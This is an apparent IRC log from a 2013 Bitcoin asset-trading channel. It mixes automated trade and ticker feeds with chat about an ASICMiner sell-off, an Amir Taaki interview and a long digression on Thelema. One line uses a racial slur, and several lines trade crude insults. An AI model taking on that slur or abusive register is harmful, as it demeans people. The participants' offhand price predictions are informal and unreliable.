under! what a deal! **** BEGIN LOGGING AT Sun May 19 12:04:19 2013 May 19 12:05:00 ;;ticker May 19 12:05:00 BTCUSD ticker | Best bid: 122.87000, Best ask: 122.93459, Bid-ask spread: 0.06459, Last trade: 122.99900, 24 hour volume: 11753.49228254, 24 hour low: 122.59591, 24 hour high: 124.29500, 24 hour vwap: 123.15340 May 19 12:09:45 [BTCTC] [TAT.ASICMINER] 20 @ 0.01946 = 0.3892 BTC [-] May 19 12:12:04 [MPEX] [S.MPOE] 9550 @ 0.0007029 = 6.7127 BTC [+] May 19 12:14:50 [BTCTC] [RSM] 31 @ 0.007001 = 0.217 BTC [-] May 19 12:15:37 [BTCTC] [RSM] 1 @ 0.014999 BTC [+] May 19 12:17:03 [HAVELOCK] [ASICM] 146 @ 0.0205 = 2.993 BTC [-] May 19 12:18:13 there we go, back over 2:) May 19 12:21:50 [BTCTC] [TAT.ASICMINER] 1 @ 0.01945 BTC [-] May 19 12:22:14 [BTCTC] [TAT.ASICMINER] 1 @ 0.019201 BTC [-] May 19 12:22:48 [BTCTC] [TAT.ASICMINER] 33 @ 0.019 = 0.627 BTC [-] May 19 12:23:32 [BTCTC] [TAT.ASICMINER] 41 @ 0.01891 = 0.7753 BTC [-] May 19 12:24:32 um May 19 12:24:51 sell off May 19 12:24:55 AM is doooomed! :) May 19 12:25:39 Chaaang-Noi: no May 19 12:25:48 friedcat did a big transfer recently May 19 12:27:17 i know, i was just kidding May 19 12:27:26 i was the one who pointed it out in the thread May 19 12:27:57 lucky for me, i was awake and ready when it happened and was able to sell a few off at 2.09 plus May 19 12:29:09 lol May 19 12:30:08 mp just hates AM May 19 12:30:30 i ahve some bids in fo s.dice at 1 hope they hit soon :) May 19 12:33:22 Chaaang-Noi so basically you're going to be howling about how you sold for the top just as soon as it goes down May 19 12:33:33 and then if it goes back up go back to claiming yoiuy're holding it and so forth ? May 19 12:33:48 i sold 30 shares May 19 12:34:04 i plan to sell 400 as soon as we are over 2 again May 19 12:34:17 however i will be holding the vast majority that i have May 19 12:34:29 some of them odds are forever no matter what happens May 19 12:34:41 in normal time i'd be shocked that all this aggitation was over a few hundred bitcoin you managed to get off some $100 investment you had forgotten about May 19 12:34:45 but then again... goat. May 19 12:35:01 "vast majority" get out. May 19 12:35:24 lol i was one of the first boardmembers pre ipo sale May 19 12:35:29 no joke May 19 12:35:43 anyway, enough trollfeeding, see you again next year or something. May 19 12:35:47 Chaaang-Noi!*@* added to ignore list. May 19 12:38:52 https://bitcointalk.org/index.php?topic=209362.msg2193455#msg2193455 lol @ /endthread. May 19 13:06:55 [BTCTC] [TAT.ASICMINER] 10 @ 0.01946 = 0.1946 BTC [+] May 19 13:07:42 [MPEX] [S.DICE] 200 @ 0.00235 = 0.47 BTC [-] May 19 13:11:42 [MPEX] [S.DICE] 238 @ 0.00230001 = 0.5474 BTC [-] May 19 13:16:42 [MPEX] [S.MPOE] 927 @ 0.00070133 = 0.6501 BTC [-] May 19 13:16:48 [MPEX] [S.MPOE] 5723 @ 0.00070126 = 4.0133 BTC [-] May 19 13:24:11 [MPEX] [S.MPOE] 3107 @ 0.0007029 = 2.1839 BTC [+] May 19 13:24:13 [MPEX] [S.MPOE] 7493 @ 0.00070439 = 5.278 BTC [+] May 19 13:39:10 http://cdn.memegenerator.net/instances/400x/17564907.jpg May 19 13:39:49 [BTCTC] [ASICMINER-PT] 1 @ 1.984998 BTC [+] May 19 13:40:04 [BTCTC] [ASICMINER-PT] 4 @ 1.984999 = 7.94 BTC [+] May 19 13:55:53 [MPEX] [S.MPOE] 10706 @ 0.00070439 = 7.5412 BTC [+] May 19 13:55:54 [MPEX] [S.MPOE] 494 @ 0.00070453 = 0.348 BTC [+] May 19 13:59:03 [HAVELOCK] [SDICE] 58 @ 0.242 = 14.036 BTC [-] May 19 13:59:54 [BTCTC] [TAT.ASICMINER] 1 @ 0.01946 BTC [+] May 19 14:04:46 [MPEX] [S.MPOE] 4106 @ 0.00070453 = 2.8928 BTC [+] May 19 14:12:02 [HAVELOCK] [ASICM] 204 @ 0.0205 = 4.182 BTC [-] May 19 14:12:41 [BTCTC] [TAT.ASICMINER] 10 @ 0.01946 = 0.1946 BTC [+] May 19 14:15:02 [HAVELOCK] [ASICM] 726 @ 0.0205 = 14.883 BTC [-] May 19 14:44:32 [MPEX] [S.MPOE] 15644 @ 0.00070512 = 11.0309 BTC [+] May 19 14:55:18 [BTCTC] [ASICMINER-PT] 1 @ 1.984999 BTC [+] May 19 15:03:01 [BTCTC] [BASIC-MINING] 2 @ 0.49 = 0.98 BTC [+] May 19 15:06:40 [BTCTC] [TAT.ASICMINER] 2 @ 0.019499 = 0.039 BTC [+] May 19 15:11:30 [BTCTC] [TAT.ASICMINER] 5 @ 0.019499 = 0.0975 BTC [+] May 19 15:12:02 [HAVELOCK] [ASICM] 1 @ 0.020512 BTC [+] May 19 15:12:52 [BTCTC] [TAT.ASICMINER] 16 @ 0.019499 = 0.312 BTC [+] May 19 15:14:16 mornin May 19 15:24:05 many cunts to you! May 19 15:29:56 [BTCTC] [TAT.ASICMINER] 9 @ 0.019588 = 0.1763 BTC [+] May 19 15:31:47 [BTCTC] [TAT.ASICMINER] 5 @ 0.019588 = 0.0979 BTC [+] May 19 15:36:49 [BTCTC] [ASICMINER-PT] 2 @ 1.984999 = 3.97 BTC [+] May 19 15:41:02 [HAVELOCK] [ASICM] 1 @ 0.01998208 BTC [-] May 19 15:42:04 [BTCTC] [TAT.ASICMINER] 3 @ 0.019588 = 0.0588 BTC [+] May 19 15:53:02 [HAVELOCK] [ASICM] 1 @ 0.02 BTC [+] May 19 15:57:12 [BTCTC] [CRYPTO-TRADE] 5 @ 0.2 = 1 BTC [+] May 19 15:58:03 [HAVELOCK] [ASICM] 1 @ 0.01995 BTC [-] May 19 15:59:02 [HAVELOCK] [ASICM] 30 @ 0.019906 = 0.5972 BTC [-] May 19 15:59:04 [HAVELOCK] [ASICM] 972 @ 0.019905 = 19.3477 BTC [-] May 19 15:59:04 [HAVELOCK] [ASICM] 1 @ 0.019904 BTC [-] May 19 16:03:01 [HAVELOCK] [ASICM] 1 @ 0.0198 BTC [-] May 19 16:05:02 [HAVELOCK] [ASICM] 1 @ 0.0198 BTC [-] May 19 16:06:02 [HAVELOCK] [ASICM] 1 @ 0.0198 BTC [-] May 19 16:10:02 [HAVELOCK] [ASICM] 20 @ 0.0198 = 0.396 BTC [-] May 19 16:10:04 [HAVELOCK] [ASICM] 10 @ 0.0198 = 0.198 BTC [-] May 19 16:41:43 [BTCTC] [ASICMINER-PT] 7 @ 1.984999 = 13.895 BTC [+] May 19 16:44:25 [BTCTC] [TAT.ASICMINER] 36 @ 0.019588 = 0.7052 BTC [+] May 19 16:44:31 [BTCTC] [ASICMINER-PT] 1 @ 1.984999 BTC [+] May 19 16:44:33 [BTCTC] [TAT.ASICMINER] 100 @ 0.0196 = 1.96 BTC [+] May 19 16:44:38 [BTCTC] [TAT.ASICMINER] 100 @ 0.01965 = 1.965 BTC [+] May 19 16:45:24 [BTCTC] [TAT.ASICMINER] 100 @ 0.0197 = 1.97 BTC [+] May 19 16:45:51 [BTCTC] [ASICMINER-PT] 2 @ 1.985 = 3.97 BTC [+] May 19 16:45:53 [BTCTC] [TAT.ASICMINER] 1 @ 0.0197 BTC [+] May 19 16:46:05 taaki strikes again https://bitcointalk.org/index.php?topic=209348.0;topicseen May 19 16:46:52 [BTCTC] [ASICMINER-PT] 1 @ 1.985 BTC [+] May 19 16:50:29 now he claims he wrote the entire bitcoin completley May 19 16:50:41 bitcoin sauce code May 19 16:51:57 wtf May 19 16:52:30 stupid interview May 19 16:52:40 takki is the heart of the bitcoin system? May 19 16:52:42 :( May 19 16:52:54 [BTCTC] [TAT.ASICMINER] 70 @ 0.01975 = 1.3825 BTC [+] May 19 16:52:56 taki is the bfl of btc May 19 16:53:00 taaki* May 19 16:55:43 lol at the video of DC monuments while taaki rants May 19 16:56:01 obnoxious May 19 16:56:12 what is he on, cocaine? May 19 16:56:33 i appreciate people educating about bitcoin May 19 16:56:44 but he is not ideal by any means May 19 16:57:13 or any one of us May 19 16:57:43 yeah but taaki comes of as vagrant gutter punk militia May 19 16:57:50 off* May 19 16:58:12 [BTCTC] [BTC-BOND] 1 @ 0.010098 BTC [+] May 19 16:58:35 and the news channel makes it worse May 19 16:58:45 by running video of US police on horse May 19 16:58:53 and washington monument clips May 19 16:59:02 [HAVELOCK] [ASICM] 3 @ 0.0203 = 0.0609 BTC [+] May 19 16:59:03 as if taaki is leading a revolution of weirdos May 19 16:59:36 it's his anarchismo hair-do May 19 17:00:13 aww i thought i invented a word May 19 17:00:19 http://www.urbandictionary.com/define.php?term=anarchismo May 19 17:01:11 his accent agitates me too May 19 17:01:33 like he should be an extra that gets shot in Transporter 5 May 19 17:03:04 incidentally, any of you ppl watching the something awful fun ? May 19 17:16:38 [BTCTC] [ASICMINER-PT] 5 @ 1.985 = 9.925 BTC [+] May 19 17:16:46 [MPEX] [S.MPOE] 16974 @ 0.00070331 = 11.938 BTC [-] May 19 17:16:47 [MPEX] [S.MPOE] 16974 @ 0.00070331 = 11.938 BTC [-] May 19 17:20:38 Someone asked earlier what BASIC maining uses for mining. List is at https://bitcointalk.org/index.php?topic=130982.0, mostly consisting of older GPUs. They have two Avalons (one #2, one #3) on order. May 19 17:20:58 I was out so only saw through remote access so couldn't respond then... May 19 17:27:21 1 day EMA 10/21 on BTC price just crossed again. First time cross since May 3 and first time positive since April 20. Good times ahead. May 19 17:28:36 Last time that happened, price went from 126 to 165 in four days. May 19 17:29:09 BTCUSD ticker | Best bid: 122.60004, Best ask: 122.60005, Bid-ask spread: 0.00001, Last trade: 122.60004, 24 hour volume: 12441.92547781, 24 hour low: 122.51100, 24 hour high: 124.50101, 24 hour vwap: 123.23513 May 19 17:29:48 Trending upwards, hence the cross. May 19 17:30:26 [BTCTC] [ASICMINER-PT] 1 @ 1.985 BTC [+] May 19 17:30:39 [BTCTC] [ASICMINER-PT] 4 @ 1.99 = 7.96 BTC [+] May 19 17:33:14 [BTCTC] [TAT.ASICMINER] 1 @ 0.01975 BTC [+] May 19 17:33:23 [MPEX] [S.MPOE] 4321 @ 0.0007027 = 3.0364 BTC [-] May 19 17:33:31 [MPEX] [S.MPOE] 13979 @ 0.00070263 = 9.8221 BTC [-] May 19 17:46:29 [BTCTC] [TAT.ASICMINER] 1 @ 0.01975 BTC [+] May 19 17:47:20 ;;estimate May 19 17:47:23 Next difficulty estimate | 12043187.5499 based on data since last change | 12105409.3926 based on data for last three days May 19 17:47:26 ;;nethash May 19 17:47:26 86655.2179971 May 19 17:47:31 ;;bc,stats May 19 17:47:33 Current Blocks: 236927 | Current Difficulty: 1.1187257461360792E7 | Next Difficulty At Block: 237887 | Next Difficulty In: 960 blocks | Next Difficulty In About: 5 days, 21 hours, 20 minutes, and 58 seconds | Next Difficulty Estimate: 12043187.5499 | Estimated Percent Change: 7.65094 May 19 17:48:08 [BTCTC] [TAT.ASICMINER] 28 @ 0.01975 = 0.553 BTC [+] May 19 17:48:27 lol https://bitcointalk.org/index.php?topic=210157.0;topicseen May 19 17:49:13 [BTCTC] [TAT.ASICMINER] 56 @ 0.0198 = 1.1088 BTC [+] May 19 17:55:58 [BTCTC] [ASICMINER-PT] 1 @ 1.99 BTC [+] May 19 17:56:05 pricewaterhouse coopers ? May 19 17:57:02 [HAVELOCK] [ASICM] 30 @ 0.020299 = 0.609 BTC [-] May 19 17:58:01 [HAVELOCK] [ASICM] 19 @ 0.020299 = 0.3857 BTC [-] May 19 18:00:01 You're quite welcome. May 19 18:01:12 I've decided that rather than publish my numbers on ASICMiner, I'm going to write a guide on how to evaluate mining companies and their shares. This seems more fair because it will not speak directly to AM (which could be argued is an attempt at price manipulation) while at the same time applies to any mining operation, past, present, or future. May 19 18:02:12 I'll explain a slightly simplified method of the one I'm using, because it is easier to understand and doesn't require too much speculation. May 19 18:02:34 i still don't see why you think anyone cares about possible price manip May 19 18:02:41 say what you gotta say! May 19 18:02:42 I care. May 19 18:02:58 if it's price manip, it'll be obvious either way May 19 18:03:07 if it's not, anyone that says it is, is a turd May 19 18:03:18 also May 19 18:03:34 it's not hard to explain the pitfalls of investing in typical mining assets May 19 18:03:44 1. If they don't reinvest, it's TOTAL garbage May 19 18:03:55 2. If they do, it'll be garbage soon enough May 19 18:04:16 3. If they are a market leader and also sell hardware, only chance May 19 18:04:29 there's your guide! May 19 18:04:55 This is a personal thing, but to me, my integrity is extremely important to me. Even the suggestion from someone that I may be 'talking AM down (or up)' is a taint on my perception of that integrity, which is why I've been quiet in the forums the past few days. May 19 18:05:22 you didnt care about my perception of you May 19 18:05:27 No, I don't. May 19 18:05:28 why care about some random indiot May 19 18:05:51 what matter is reality May 19 18:05:55 be what you are May 19 18:05:59 it's all good May 19 18:06:17 I don't care about their perception, I care about my perception. If I come about as someone that even in the remotest of possibilities may say something for any other purpose than neutral information, I've failed and thus need to reevaluate my approach. May 19 18:06:38 you realize the contradiction there, right? May 19 18:06:47 Please explain. May 19 18:07:07 I don't care about their perception, except for when I do May 19 18:07:42 That's not what I was saying, but hey, you interpret it the way that makes you comfortable. May 19 18:07:59 the only way to have a chance of being received as neutral May 19 18:07:59 furuknap you're being overdramatic May 19 18:08:02 this is the interwebs. May 19 18:08:04 is to be neutral May 19 18:08:16 and that requires not caring what people think May 19 18:08:37 being an asshole works too. most people can't distinguish these anyway. May 19 18:08:41 [BTCTC] [COGNITIVE] 1 @ 0.234997 BTC [-] May 19 18:08:50 otherwise you are working to manipulate people to believe you are neutral May 19 18:08:55 mp, I am the asshole, just ask anyone in the SharePoint community :-) May 19 18:08:56 whether you are or not May 19 18:10:03 truffles, I care for myself and myself only. I am a Thelemite, so it is in my nature. I care not for what others think of me, not even what my immediate family thinks of me, much less some random strangers on the interwebs. May 19 18:10:21 that's pretty unlikely May 19 18:10:33 are you like buddha or something? May 19 18:10:33 What is unlikely? That I'm a Thelemite? May 19 18:11:38 i don't wanna get too abstract but May 19 18:12:05 it is my opinion that if you seek out a name for yourself and subscribe to a belief, you are already failing to be what you say you are May 19 18:12:16 why tell us at all? May 19 18:12:19 However, I care about my pride, and I want to be proud of what I do because it is the best I can do. If I do not accomplish that, I have not done my best, which is a strike on my abilities. It's a long, long conversation, though, and whether someone understands that is irrelevant, and I have no need to explain. May 19 18:12:42 Because you asked. May 19 18:13:16 without some sort of validation, your actions to maintain pride would remain unconfirmed May 19 18:13:40 I think to dwell on these things May 19 18:13:46 is to care about perception May 19 18:14:11 That is your opinion and like I said, does not affect mine. If you don't understand, I have no problems with that. May 19 18:14:23 i want to see your raw assessment May 19 18:14:28 because otherwise May 19 18:14:34 i have no way to dismantle it May 19 18:14:48 Your desires are also not very interesting to me. You may want all you like. May 19 18:15:00 lol May 19 18:15:02 whatever May 19 18:15:06 why even talk to us May 19 18:15:14 go be you May 19 18:16:28 I'm talking to you because my statements about AM was a matter of discussion and part of that discussion was the analysis I had made that showed AM had no chance in hell to make back investments at these levels. I said I would publish those numbers but decided as a matter of fairness to instead publish a simplified method for determining it yourself. May 19 18:16:47 i'm aware May 19 18:17:45 bitcoin-assets is sorta like irc roulette. May 19 18:17:55 http://polimedia.us/dtng/c/src/12824537362.jpg May 19 18:17:58 the topic is now niggers. May 19 18:18:17 lol May 19 18:19:06 do you think there are any black Thelemites? May 19 18:19:09 [17:14] im viewing it as, u think ur info will be so factual that none will think otherwise > I still do not care what others think. I care about what I think. May 19 18:19:18 I know there are many :-) May 19 18:19:24 correct answer is May 19 18:19:29 Who cares? May 19 18:19:32 badoom! May 19 18:20:20 You are quite right. As was I :-) May 19 18:20:33 [BTCTC] [ASICMINER-PT] 1 @ 1.99 BTC [+] May 19 18:21:04 i try to disclaim likely bias when appropriate May 19 18:21:07 it never works May 19 18:21:09 truffles, if my information is biased, I will make it as clear as I possibly can. May 19 18:21:46 it'll be biased anyway May 19 18:21:49 Some information must be biased. May 19 18:21:58 [BTCTC] [TAT.ASICMINER] 6 @ 0.0199 = 0.1194 BTC [+] May 19 18:22:00 you are biased to making it your idea of unbiased May 19 18:22:02 [HAVELOCK] [ASICM] 1 @ 0.0203 BTC [+] May 19 18:22:02 :P May 19 18:22:20 ...or will be perceived as such. Declaration of interests make the reader aware of any bias and can evaluate the information in that light. May 19 18:22:24 [BTCTC] [ASICMINER-PT] 5 @ 1.99 = 9.95 BTC [+] May 19 18:23:02 [HAVELOCK] [ASICM] 16 @ 0.0203 = 0.3248 BTC [+] May 19 18:23:03 [HAVELOCK] [ASICM] 180 @ 0.02033 = 3.6594 BTC [+] May 19 18:23:43 In some cases, that declaration is implied. 'Everyone' that reads my SharePoint stuff know most of my opinions, and for those that don't, I have made them clear no numerous and public occasions. I don't need to say in every article that "I do not approve of SharePoint Server, I love SharePoint Foundation, I hate certain members of the SharePoint dev team in Redmond, I like certain members of the community" and so on. May 19 18:24:02 [HAVELOCK] [ASICM] 1 @ 0.01981 BTC [-] May 19 18:24:34 Are thelemites allowed to hate May 19 18:24:36 ? May 19 18:25:03 You're allowed to do whatever you will, but hating seems somewhat counter productive and thus wouldn't make you much of a Thelemite. May 19 18:25:22 those devs in redmond must feel pretty special then May 19 18:25:48 They do. They talk about me all the time. At times, they have had daily meeting about me. May 19 18:26:13 but who cares, right? May 19 18:26:22 They apparently do :-) I don't. May 19 18:26:31 me either May 19 18:26:37 That's a good start. May 19 18:26:42 thanks! May 19 18:26:52 wait May 19 18:26:56 can i thank people? May 19 18:27:07 this is getting tricky for me May 19 18:27:09 I want out May 19 18:27:22 If you will, you can. The entire belief system on Thelemites is "Do what tough wilt". Nothing more, nothing less. May 19 18:27:31 so May 19 18:27:31 * Thou May 19 18:27:32 i dont care May 19 18:27:41 now i see the appeal May 19 18:27:47 you can just care whenever you want May 19 18:27:54 Indeed :-) May 19 18:27:54 or not May 19 18:28:03 [HAVELOCK] [ASICM] 1 @ 0.02032 BTC [+] May 19 18:28:24 This isn't a philosophical channel, but if you want to learn, read up on it. It's a pretty fascinating philosphy. May 19 18:28:34 [MPEX] [S.MPOE] 17921 @ 0.00070263 = 12.5918 BTC [-] May 19 18:28:36 [MPEX] [S.MPOE] 4479 @ 0.00070263 = 3.1471 BTC [-] May 19 18:28:42 i have no idea why the notion of doing whatever the fuck you please needs a name May 19 18:28:53 that was my initial point May 19 18:29:02 [HAVELOCK] [ASICM] 2 @ 0.02032 = 0.0406 BTC [+] May 19 18:29:03 There's a difference between "whatever the fuck you please" and "what you will". May 19 18:29:17 i searched for the philosophy that fit my lifestyle a few times when I was younger May 19 18:29:19 nothing matched May 19 18:29:24 so i said fuck it May 19 18:29:33 That's also a good start :-) May 19 18:29:34 fucking it usually works. May 19 18:30:10 closedt i found was buddhism, but the whole being one with nothingness is ridiculous to me May 19 18:30:12 what's the point of adopting a philosophy your lifestyle fits the best with? isn't that just doing what you'd like anyway? May 19 18:30:19 truffles, by what you probably mean by "believe in a God", no I don't. May 19 18:30:31 saulimus, it was a youth thing May 19 18:30:35 like trying to find yourself May 19 18:30:41 and realizing I'm right here May 19 18:30:57 as best i can May 19 18:31:11 the whole mortality thing is still unresolved May 19 18:31:19 but i just block that out May 19 18:31:22 and carry on May 19 18:31:49 Morality is relative and thus subjective. What works for you works for you. If you care not for what others think, that is all that matters. May 19 18:32:15 i said mortality May 19 18:32:19 not moral May 19 18:32:24 Ah, my bad, misread it. May 19 18:32:37 i dont wanna die! May 19 18:32:40 simple as that May 19 18:33:24 Nobody wants to die, really. Whether you allow the fear of dying control or affect your actions is more relevant. May 19 18:33:38 i do May 19 18:34:04 it can make me impatient and extremely averse to undue stresses May 19 18:34:29 truffles, you're catching on! I do care about me, but you're thinking correctly about the issue. May 19 18:34:42 "For God so loved the world, that He gave His only begotten Son, that whoever believes in Him shall not perish, but have eternal life." <- solution right there (disclaimer: I'm a christian) May 19 18:34:54 TAT, you want to die or you allow the fear of it to control your actions`? May 19 18:36:16 [BTCTC] [ASICMINER-PT] 1 @ 1.99 BTC [+] May 19 18:36:28 it affects my actions May 19 18:36:39 which is probably universal to most humans May 19 18:37:08 and many other living things May 19 18:37:26 To some extent, that is what keeps humans alive, yes, but fear that prevents you from reaching your goals is bad. May 19 18:37:41 [BTCTC] [TAT.ASICMINER] 12 @ 0.0199 = 0.2388 BTC [+] May 19 18:37:46 Firecoin2 initially began as a Feathercoin2, a joke coin created to poke fun at all the recent altcoin releases. However, after a surprisingly smooth launch, and some community support, it has been decided that this coin will relaunch as Firecoin2. May 19 18:37:48 I lol'd May 19 18:38:23 [11:37] To some extent, that is what keeps humans alive, yes, but fear that prevents you from reaching your goals is bad. --- Makes me think of The Alchemist May 19 18:38:58 Paulo Choelly is a Thelemite :-) May 19 18:39:05 Choello May 19 18:39:06 heh May 19 18:39:06 [BTCTC] [TAT.ASICMINER] 30 @ 0.0199 = 0.597 BTC [+] May 19 18:39:10 coelho May 19 18:39:12 Damn1 May 19 18:39:20 i'm portuguese too May 19 18:39:20 Can't even hit the keys... May 19 18:39:28 well, he might be brazilian May 19 18:39:36 not a real portuguee! May 19 18:40:01 [BTCTC] [COGNITIVE] 1 @ 0.234997 BTC [-] May 19 18:40:19 truffles, like I said, this isn't really a philosophy forum. Feel free to PM me, though, unless of course everyone is fine with the conversation. May 19 18:40:35 it's not like anything else is going on... May 19 18:40:38 but May 19 18:40:47 i'd rather you write your damn analysis May 19 18:40:48 :) May 19 18:40:54 [BTCTC] [TAT.ASICMINER] 8 @ 0.0199 = 0.1592 BTC [+] May 19 18:41:16 Two monitors, two hands, two eyes, two halves of a brain... I was built for dual-tasking :-) May 19 18:41:56 [BTCTC] [TAT.ASICMINER] 44 @ 0.0199 = 0.8756 BTC [+] May 19 18:42:06 In that case, feel free to ask your questions. I'll answer as best I can. May 19 18:42:34 can anyone truly multi-task, isn't it mostly just ignoring many things at once? May 19 18:42:36 ;) May 19 18:44:04 [MPEX] [S.MPOE] 4321 @ 0.0007032 = 3.0385 BTC [+] May 19 18:44:08 [MPEX] [S.MPOE] 22708 @ 0.00070331 = 15.9708 BTC [+] May 19 18:44:10 [MPEX] [S.MPOE] 9771 @ 0.00070457 = 6.8844 BTC [+] May 19 18:44:21 Mostly, you're not really efficient if you multi-task. Task switching, however, can be quite efficient. May 19 18:46:05 Magic? I don't do magic. Magick, on the other hand, I do all the time. So do you. May 19 18:47:23 more crowley May 19 18:47:24 Well, consider what most people think of when they think "Magic". It's Harry Potter, right? Some desired outcome, some formula or incantation, and poof, that desired outcome happens (or fizzles). May 19 18:48:15 In Magick, it is actually the same thing. You have a desired goal and you perform some ritual to achieve that goal. If the ritual is done correctly and is the correct ritual, your achieve your goal. May 19 18:48:33 and The Alchemist May 19 18:48:40 and Field of Dreams May 19 18:48:41 :) May 19 18:49:09 "The Secret" as far as I've understood, is mostly based on thelemic principles, yes. It's a bastardization as far as my peers have determined it, but I have not read it so I don't know. May 19 18:50:33 i wouldnt call it magic, but I do believe that as species we almost literally capable of anything May 19 18:50:43 just a matter of time and effort May 19 18:50:43 The "Magick" that most people think about involves mysterious and secret rituals with sacrificing goats and whatnot. However, in reality, Magick is much simpler. You wake up and your breath smells like wet dog. Your desired goal is to have a nice breath. Your ritual is to go to the bathroom, but some potion on a brush and rub on your teeth. If you do, your breath smells nice. May 19 18:51:02 [HAVELOCK] [ASICM] 10 @ 0.02033 = 0.2033 BTC [+] May 19 18:51:03 [HAVELOCK] [ASICM] 3 @ 0.02033 = 0.061 BTC [+] May 19 18:51:45 if we can conceive of an idea, odds are we can make it reality May 19 18:51:55 well, odds is the wrong word May 19 18:51:59 That's about as far as you need to go to understand "Magick". There is, of course, far more to it that that, but it doesn't involve anything supernatural or anything like that. May 19 18:52:01 but you know what I mean May 19 18:53:01 Or explaining something special in an easy to understand way :-) May 19 18:53:23 magick equates to, if you want something to be a certain way, then take action to make it that way May 19 18:53:59 TAT: Yes, exactly. Again, somewhat simplified, but really, that's what's happening. May 19 18:54:23 Magick is far more than daily routine. It is about shaping yourself, your mind, and the environment around you to create a reality that matches what you will. May 19 18:54:27 [BTCTC] [TAT.ASICMINER] 10 @ 0.019525 = 0.1953 BTC [-] May 19 18:54:39 but the magic people adore is the kind that breaks laws of science, paradigm shifts at the very least May 19 18:54:41 [BTCTC] [ASICMINER-PT] 24 @ 2 = 48 BTC [+] May 19 18:54:46 [BTCTC] [TAT.ASICMINER] 5 @ 0.019525 = 0.0976 BTC [-] May 19 18:54:51 yay we're back at 2 May 19 18:55:02 TAT: Yes, but those are just supersticious morons. May 19 18:55:20 i love paradigm shifts though May 19 18:55:28 that's the real magic May 19 18:55:45 If that is within the realm of possibility and you know the "spells" to make it happen, certainly. May 19 18:55:46 showing that we are only limited by our own creativity May 19 18:55:58 [BTCTC] [ASICMINER-PT] 2 @ 2 = 4 BTC [+] **** BEGIN LOGGING AT Sun May 19 21:26:13 2013 May 19 21:27:32 [BTCTC] [GSDPT] 10 @ 0.00273 = 0.0273 BTC [-] May 19 21:27:49 [BTCTC] [TAT.ASICMINER] 37 @ 0.0202 = 0.7474 BTC [-] May 19 21:32:20 [BTCTC] [ASICMINER-PT] 2 @ 1.99999 = 4 BTC [-] May 19 21:35:02 [HAVELOCK] [ASICM] 1 @ 0.019801 BTC [-] May 19 21:35:04 [HAVELOCK] [ASICM] 124 @ 0.0198 = 2.4552 BTC [-] May 19 21:35:28 !depth m s.mpoe May 19 21:35:46 s.mpoe spread asstight, why? May 19 21:36:11 depth is infinite. May 19 21:36:17 [BTCTC] [ASICMINER-PT] 39 @ 1.99999 = 77.9996 BTC [-] May 19 21:37:01 lol May 19 21:37:05 150k shares within 1% of price on both sides May 19 21:37:36 um May 19 21:37:41 150k shares is nothing ? May 19 21:38:20 if you check history, it was not so tight before May 19 21:38:36 abruptly changed on May 11 May 19 21:39:38 i've never kept very close tabs on it May 19 21:40:01 my paranoid hypothesis is someone spotted my bot which i relaunched on may 10 and is sniping it, but dunno why May 19 21:41:02 [HAVELOCK] [ASICM] 150 @ 0.0198 = 2.97 BTC [-] May 19 21:42:03 it was profiting nicely, now not so much and it annoys me May 19 21:42:11 lol May 19 21:42:22 well... so snipe it back May 19 21:44:13 don't really see any pattern other than the spread May 19 21:44:33 [BTCTC] [TAT.ASICMINER] 4 @ 0.020239 = 0.081 BTC [+] May 19 21:47:10 assbot, it's you? May 19 21:48:03 [HAVELOCK] [ASICM] 233 @ 0.0198 = 4.6134 BTC [-] May 19 21:54:03 [HAVELOCK] [ASICM] 267 @ 0.02 = 5.34 BTC [+] May 19 22:04:41 [BTCTC] [BTC-BOND] 100 @ 0.010098 = 1.0098 BTC [+] May 19 22:07:09 [BTCTC] [PAJKA.BOND] 2 @ 0.108 = 0.216 BTC [-] May 19 22:09:16 [MPEX] [S.MPOE] 4596 @ 0.00070126 = 3.223 BTC [-] May 19 22:19:20 [BTCTC] [ASICMINER-PT] 3 @ 2.035 = 6.105 BTC [+] May 19 22:28:20 [BTCTC] [ASICMINER-PT] 1 @ 2.078752 BTC [+] May 19 22:29:18 [BTCTC] [ASICMINER-PT] 1 @ 2.078752 BTC [+] May 19 22:29:21 [BTCTC] [ASICMINER-PT] 2 @ 2.078752 = 4.1575 BTC [+] May 19 22:29:51 [BTCTC] [ASICMINER-PT] 1 @ 2.078752 BTC [+] May 19 22:30:02 [HAVELOCK] [HIM] 1 @ 1.59 BTC [-] May 19 22:30:50 [BTCTC] [TAT.ASICMINER] 14 @ 0.020239 = 0.2833 BTC [+] May 19 22:31:45 [BTCTC] [ASICMINER-PT] 1 @ 2.078751 BTC [-] May 19 22:32:01 [BTCTC] [ASICMINER-PT] 3 @ 2.078751 = 6.2363 BTC [-] May 19 22:32:19 [BTCTC] [ASICMINER-PT] 4 @ 2.078752 = 8.315 BTC [+] May 19 22:32:54 [BTCTC] [ASICMINER-PT] 5 @ 2.0788 = 10.394 BTC [+] May 19 22:33:03 [BTCTC] [ASICMINER-PT] 2 @ 2.079 = 4.158 BTC [+] May 19 22:33:18 [BTCTC] [ASICMINER-PT] 8 @ 2.08 = 16.64 BTC [+] May 19 22:33:36 [BTCTC] [ASICMINER-PT] 9 @ 2.088 = 18.792 BTC [+] May 19 22:33:55 [BTCTC] [ASICMINER-PT] 3 @ 2.089 = 6.267 BTC [+] May 19 22:34:02 [HAVELOCK] [ASICM] 12 @ 0.02 = 0.24 BTC [+] May 19 22:34:10 [BTCTC] [ASICMINER-PT] 16 @ 2.08999 = 33.4398 BTC [+] May 19 22:34:54 http://www.reddit.com/r/Bitcoin/comments/1elfgj/zhoutonged_please_come_play_at_bitcoin2013/ May 19 22:35:13 https://twitter.com/adrjeffries/status/336202078936502273/photo/1 May 19 22:36:31 fuck me :| May 19 22:36:38 why is pirate not there??1 May 19 22:37:00 oh wait, he prolly is. May 19 22:39:40 [BTCTC] [ASICMINER-PT] 4 @ 2.08995 = 8.3598 BTC [-] May 19 22:40:07 https://twitter.com/GoWestBTC/status/336203810722680832/photo/1 May 19 22:40:09 O_o May 19 22:40:56 [BTCTC] [TAT.ASICMINER] 32 @ 0.020239 = 0.6476 BTC [+] May 19 22:41:59 [BTCTC] [TAT.ASICMINER] 45 @ 0.02025 = 0.9113 BTC [+] May 19 22:43:03 [BTCTC] [TAT.ASICMINER] 3 @ 0.02035 = 0.0611 BTC [+] May 19 22:43:24 [BTCTC] [TAT.ASICMINER] 18 @ 0.02038 = 0.3668 BTC [+] May 19 22:43:39 [BTCTC] [PAJKA.BOND] 5 @ 0.108 = 0.54 BTC [-] May 19 22:44:26 [BTCTC] [ASICMINER-PT] 1 @ 2.08995 BTC [-] May 19 22:46:49 [BTCTC] [ASICMINER-PT] 2 @ 2.08996 = 4.1799 BTC [+] May 19 22:48:05 